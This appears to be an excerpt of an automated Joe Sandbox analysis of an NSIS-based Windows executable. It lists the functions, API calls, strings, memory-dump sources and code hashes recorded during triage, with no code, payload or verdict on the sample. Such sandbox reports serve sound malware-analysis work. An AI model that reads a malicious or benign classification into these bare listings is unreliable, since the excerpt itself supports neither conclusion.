ShellExecuteA.SHELL32(0000070B,open,0042D340,00000000,00000000,00000001), ref: 004041D6
LoadCursorA.USER32(00000000,00007F00), ref: 004041E3
SetCursor.USER32(00000000), ref: 004041E6
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404212
SendMessageA.USER32(00000010,00000000,00000000), ref: 00404226

Strings

N, xrefs: 00404159
open, xrefs: 004041CE

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$open
API String ID: 3615053054-904208323
Opcode ID: bd37493bba8a7160a5fbdbedca7196346d7bbe886d3872d1f711f9678ebaf451
Instruction ID: 4a720cbc7ced66984b2347167a4dd5be7871a0de437cfd71c5777b4804bda38e
Opcode Fuzzy Hash: bd37493bba8a7160a5fbdbedca7196346d7bbe886d3872d1f711f9678ebaf451
Instruction Fuzzy Hash: CA61C2B1A40209BFEB109F61CC45F6A7B69FB84701F10407AFB00BA2D1C7B8A951CF99

Function 004058C9 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpyA.KERNEL32(0042B5B0,NUL,?,00000000,?,00000000,?,00405A6D,?,?,00000001,00405610,?,00000000,000000F1,?), ref: 004058D9
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A6D,?,?,00000001,00405610,?,00000000,000000F1,?), ref: 004058FD
GetShortPathNameA.KERNEL32(00000000,0042B5B0,00000400), ref: 00405906

Part of subcall function 00405787: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 00405797
Part of subcall function 00405787: lstrlenA.KERNEL32(004059B6,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 004057C9

GetShortPathNameA.KERNEL32(?,0042B9B0,00000400), ref: 00405923
wsprintfA.USER32 ref: 00405941
GetFileSize.KERNEL32(00000000,00000000,0042B9B0,C0000000,00000004,0042B9B0,?,?,?,?,?), ref: 0040597C
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040598B
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004059C3
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,0042B1B0,00000000,-0000000A,0040936C,00000000,[Rename],00000000,00000000,00000000), ref: 00405A19
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405A2B
GlobalFree.KERNEL32(00000000), ref: 00405A32
CloseHandle.KERNEL32(00000000), ref: 00405A39

Part of subcall function 00405822: GetFileAttributesA.KERNEL32(00000003,00402C69,00435C00,80000000,00000003), ref: 00405826
Part of subcall function 00405822: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405848

Strings

[Rename], xrefs: 004059AB, 004059BD
%s=%s, xrefs: 00405937
NUL, xrefs: 004058D3

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 1265525490-4148678300
Opcode ID: 327445c9d1c9927783c3f3457bb2a4ab25aba66808bf47e8d04e43f3f6866f7b
Instruction ID: a7ae131883122c305ebb5a94e4791e7dc74bc152dd9dfe90db1d6281d1838ee4
Opcode Fuzzy Hash: 327445c9d1c9927783c3f3457bb2a4ab25aba66808bf47e8d04e43f3f6866f7b
Instruction Fuzzy Hash: EE41EF71A05A55AFD3206B215C89F6B3A5CEB45758F14053ABE02B22D2DA7CAC018EBD

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,0042DBA0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 91a2245b94a8841dbbb3e7c6d70d151623849c123f413ff1f54cc8de7c044c5d
Instruction ID: 56390ffcd2b5ebfb5c65d4f338f2fcdd02e5d2b15fd4a6b60b61e3d9fa1f9be4
Opcode Fuzzy Hash: 91a2245b94a8841dbbb3e7c6d70d151623849c123f413ff1f54cc8de7c044c5d
Instruction Fuzzy Hash: 5E418971804249AFCB058F95DD459AFBBB9FF44311F00812AF962AA1A0C738EA51DFA5

Function 004042BD Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 268stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040430C
SetWindowTextA.USER32(00000000,?), ref: 00404336
SHBrowseForFolderA.SHELL32(?,00428BF8,?), ref: 004043E7
CoTaskMemFree.OLE32(00000000), ref: 004043F2
lstrcmpiA.KERNEL32(0042D340,00429820), ref: 00404424
lstrcatA.KERNEL32(?,0042D340), ref: 00404430
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404442

Part of subcall function 00405389: GetDlgItemTextA.USER32(?,?,00000400,00404479), ref: 0040539C

Part of subcall function 00405DFC: CharNextA.USER32(?,*?|<>/":,00000000,00434000,00435400,00435400,00000000,004030BA,00435400,764D3410,00403294), ref: 00405E54
Part of subcall function 00405DFC: CharNextA.USER32(?,?,?,00000000), ref: 00405E61
Part of subcall function 00405DFC: CharNextA.USER32(?,00434000,00435400,00435400,00000000,004030BA,00435400,764D3410,00403294), ref: 00405E66
Part of subcall function 00405DFC: CharPrevA.USER32(?,?,00435400,00435400,00000000,004030BA,00435400,764D3410,00403294), ref: 00405E76

GetDiskFreeSpaceA.KERNEL32(004287F0,?,?,0000040F,?,004287F0,004287F0,?,00000000,004287F0,?,?,000003FB,?), ref: 004044FD
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404518
SetDlgItemTextA.USER32(00000000,00000400,004287E0), ref: 0040459E

Strings

A, xrefs: 004043E0

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A
API String ID: 2246997448-3554254475
Opcode ID: b3b7e376e707d9eda9690b5ceb933977ae0e1f069ee966c462b3593b74f8338b
Instruction ID: 21907f09a7f0adac02db5a20439709df020a6e4e4535a3db2c95f33fac12625f
Opcode Fuzzy Hash: b3b7e376e707d9eda9690b5ceb933977ae0e1f069ee966c462b3593b74f8338b
Instruction Fuzzy Hash: 039171B1900219BBDB11AFA1CC85BAF77B8EF84314F10447BFA04B62C1D77C9A418B69

Function 00405BB3 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 199stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,00429000,00000000,00404EB4,00429000,00000000), ref: 00405C64
GetSystemDirectoryA.KERNEL32(0042D340,00000400), ref: 00405CDF
GetWindowsDirectoryA.KERNEL32(0042D340,00000400), ref: 00405CF2
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405D2E
SHGetPathFromIDListA.SHELL32(?,0042D340), ref: 00405D3C
CoTaskMemFree.OLE32(?), ref: 00405D47
lstrcatA.KERNEL32(0042D340,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D69
lstrlenA.KERNEL32(0042D340,?,00429000,00000000,00404EB4,00429000,00000000), ref: 00405DBB

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D63
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405CAE

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-730719616
Opcode ID: f67fc36d875180e0be9eee5385700d9ad82d05813cf02bda3c13f2274c01b590
Instruction ID: 03bbcc83ae8db2cba80ea7df372ba0a8a6f53f324bd5ae32260a6f1a1bd8d9a5
Opcode Fuzzy Hash: f67fc36d875180e0be9eee5385700d9ad82d05813cf02bda3c13f2274c01b590
Instruction Fuzzy Hash: 8E61F271A04A05AEEF215B65CC88BBF3BA5DF11704F20813BE901B62D1D27D5882DF5E

Function 00402C29 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402C3A
GetModuleFileNameA.KERNEL32(00000000,00435C00,00000400), ref: 00402C56

Part of subcall function 00405822: GetFileAttributesA.KERNEL32(00000003,00402C69,00435C00,80000000,00000003), ref: 00405826
Part of subcall function 00405822: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405848

GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,00434C00,00434C00,00435C00,00435C00,80000000,00000003), ref: 00402CA2

Strings

Null, xrefs: 00402D20
soft, xrefs: 00402D17
Error launching installer, xrefs: 00402C79
Inst, xrefs: 00402D0E
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E01

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-1074636621
Opcode ID: 737df57802bde90b1dd81f9f9cbaf29b7d289456ab0cf199b5c66e23c5e8ffc4
Instruction ID: c80feb63f856711914d44cd07d0e36175ef9d189e1e49feff23a0d5b70f6312c
Opcode Fuzzy Hash: 737df57802bde90b1dd81f9f9cbaf29b7d289456ab0cf199b5c66e23c5e8ffc4
Instruction Fuzzy Hash: AB51D331A00214ABDB209F65DE89B9E7AB4AB04719F10413BF905B72D1D7BC9D818BAD

Function 339DA1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 339DA25D
RtlDebugPrintTimes.NTDLL ref: 339DA2F1
RtlDebugPrintTimes.NTDLL ref: 339DA314
RtlDebugPrintTimes.NTDLL ref: 339DA340
RtlDebugPrintTimes.NTDLL ref: 339DA415
RtlDebugPrintTimes.NTDLL ref: 339DA468
RtlDebugPrintTimes.NTDLL ref: 339DA487
RtlDebugPrintTimes.NTDLL ref: 339DA4B8

Strings

HEAP: , xrefs: 339DA206

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: 915663368170c6debb51f04dc9acde7cbfd44a7c79be637b91f9ba5f877e766f
Instruction ID: fbb1859042b6f53be2c0bd65957422cbc4bb2387cf054a70bfe35b4fc13fcb4a
Opcode Fuzzy Hash: 915663368170c6debb51f04dc9acde7cbfd44a7c79be637b91f9ba5f877e766f
Instruction Fuzzy Hash: 99A19A75A08312CFD714DE28C895A1AB7EAFF88390F18852DE945DB310EB70EC55CB91

Function 33937550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

Execute=1, xrefs: 3397451E
ExecuteOptions, xrefs: 339744AB
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 33974460
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3397454D
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 33974530
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 33974507
CLIENT(ntdll): Processing section info %ws..., xrefs: 33974592

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 914bb44c4598b368ed9b40273cddf84420b7d88b12389adc9dc14d96b9294fc0
Instruction ID: 4d79e83c014845ae4c29f91394e49173cfb8ec8ae82eb090322b7d78f873b130
Opcode Fuzzy Hash: 914bb44c4598b368ed9b40273cddf84420b7d88b12389adc9dc14d96b9294fc0
Instruction Fuzzy Hash: 825137B1A01309EAEB15AB94DC94FAD73ACEF06394F0404E9E505AB582EB709A41CF61

Function 3391A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON

Download Yara Rule

Strings

RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 339678F3
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 339677E2
Actx , xrefs: 33967819, 33967880
SsHd, xrefs: 3391A304
RtlpFindActivationContextSection_CheckParameters, xrefs: 339677DD, 33967802
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33967807

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: 012fc69f3045fbc2e4c1db580794e13263b871d84eb161831d3b728098d82941
Instruction ID: f6b8081ab50de983a2eaffd5c48a1fba34f22d3f594eb5feeb053dfee31c8e5f
Opcode Fuzzy Hash: 012fc69f3045fbc2e4c1db580794e13263b871d84eb161831d3b728098d82941
Instruction Fuzzy Hash: BEE1E474E08309CFE715CE68C89071AB7E9BB843A4F540A2DF8A5EB291D731DC55CB81

Function 3391D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 33969299

Strings

SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33969153
Actx , xrefs: 33969315
GsHd, xrefs: 3391D794
RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 33969372
RtlpFindActivationContextSection_CheckParameters, xrefs: 3396914E, 33969173
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33969178

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-2196497285
Opcode ID: a7475e96539a95bac44b033e86228e86a20f16dbdcee9fe96fc595347c871a65
Instruction ID: bde7626affe76aec7d1e68afcb4ef0bfdae75150ccac863142f71c7c3687e2cd
Opcode Fuzzy Hash: a7475e96539a95bac44b033e86228e86a20f16dbdcee9fe96fc595347c871a65
Instruction Fuzzy Hash: BFE1B174A05346CFE710CF18C880B5BB7ECBF883A8F544A6DE8959B291D771E854CB92

Function 00402E62 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402ECA
GetTickCount.KERNEL32 ref: 00402F6F
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F98
wsprintfA.USER32 ref: 00402FA8
WriteFile.KERNEL32(00000000,00000000,?,7FFFFFFF,00000000), ref: 00402FD6

Strings

... %d%%, xrefs: 00402FA2

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%
API String ID: 4209647438-2449383134
Opcode ID: 1fa3e8c4adcc56b04dfbbc94917ea066f3dcbe6d9c1f3563fcd3960635240e7a
Instruction ID: 6a3fda1890073d0766cfbb54329871e7c274013a7bb5ca031e3128d44e3cc29a
Opcode Fuzzy Hash: 1fa3e8c4adcc56b04dfbbc94917ea066f3dcbe6d9c1f3563fcd3960635240e7a
Instruction Fuzzy Hash: 5F619D7190121A9BCF10DFA5DA44AAE7BBCAF40395F14413BF811B72D4C3789E50DBAA

Function 338F640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 338F651C

Part of subcall function 338F6565: RtlDebugPrintTimes.NTDLL ref: 338F6614
Part of subcall function 338F6565: RtlDebugPrintTimes.NTDLL ref: 338F665F

Strings

Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3395977C
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 339597B9
LdrpInitShimEngine, xrefs: 33959783, 33959796, 339597BF
apphelp.dll, xrefs: 338F6446
Getting the shim engine exports failed with status 0x%08lx, xrefs: 33959790
minkernel\ntdll\ldrinit.c, xrefs: 339597A0, 339597C9

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-204845295
Opcode ID: 27edda0068ca1b060ebda5b579177de3995359e0e8fb0f92a3db36443db3541a
Instruction ID: dc898b3790de9f70426eac8b6aca492955eca4132d3d9bb9e7fbfa0c40df4085
Opcode Fuzzy Hash: 27edda0068ca1b060ebda5b579177de3995359e0e8fb0f92a3db36443db3541a
Instruction Fuzzy Hash: BE51B271A09304DFF310EF68D890A6B77E8EF84744F40091EF5A5AB6A1EB31D944CB92

Function 3397FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3397FAF3
RtlDebugPrintTimes.NTDLL ref: 3397FB15

Strings

Unknown, xrefs: 3397FA42, 3397FA54
Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx, xrefs: 3397FA58
$, xrefs: 3397FABD
minkernel\ntdll\ldrdload.c, xrefs: 3397FA68
LdrpRedirectDelayloadFailure, xrefs: 3397FA5E

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
API String ID: 3446177414-4227709934
Opcode ID: 15fa4967e382df4dc4e2934bd84c4a908dd3cdfa92feee94c821da82680ac143
Instruction ID: 72fc7be0387661fc22faaa4e13e9bed2485d5b52a73f089e600426689956e0e7
Opcode Fuzzy Hash: 15fa4967e382df4dc4e2934bd84c4a908dd3cdfa92feee94c821da82680ac143
Instruction Fuzzy Hash: 634160B5A01209EFEB05DF99C884ADEBBB9FF48794F140129E925B7380D771AD01CB90

Function 00403EE6 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00403F03
GetSysColor.USER32(00000000), ref: 00403F1F
SetTextColor.GDI32(?,00000000), ref: 00403F2B
SetBkMode.GDI32(?,?), ref: 00403F37
GetSysColor.USER32(?), ref: 00403F4A
SetBkColor.GDI32(?,?), ref: 00403F5A
DeleteObject.GDI32(?), ref: 00403F74
CreateBrushIndirect.GDI32(?), ref: 00403F7E

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction ID: 0203d41d11b8997b99186d389223a7b6b7934b4d059f66b1a69252c0c80ebb8f
Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction Fuzzy Hash: F6218471904745ABCB219F68DD48B4BBFF8AF01715F048A29EC95E22E1C738EA04CB65

Function 339AF8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 339AF92E

Strings

About to free block at %p with tag %ws, xrefs: 339AFAFE
HEAP[%wZ]: , xrefs: 339AF9EC, 339AFAD7
HEAP: , xrefs: 339AF9F9, 339AFAE4
RtlFreeHeap, xrefs: 339AF948, 339AF9B2
About to free block at %p, xrefs: 339AFA0A

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
API String ID: 3446177414-3492000579
Opcode ID: cc608f9899f0ad7a87ab839d9431015d1d2608b11134753e4a2c45e3893cb7cd
Instruction ID: 31f2de6c0151e7d51547806ba5a5c3672fcd543273da083f78861e2dfe9042a5
Opcode Fuzzy Hash: cc608f9899f0ad7a87ab839d9431015d1d2608b11134753e4a2c45e3893cb7cd
Instruction Fuzzy Hash: F071ED31909645DFDB01DFACD8906A9FBF5FF48340F08825AE496AB752DB319981CB40

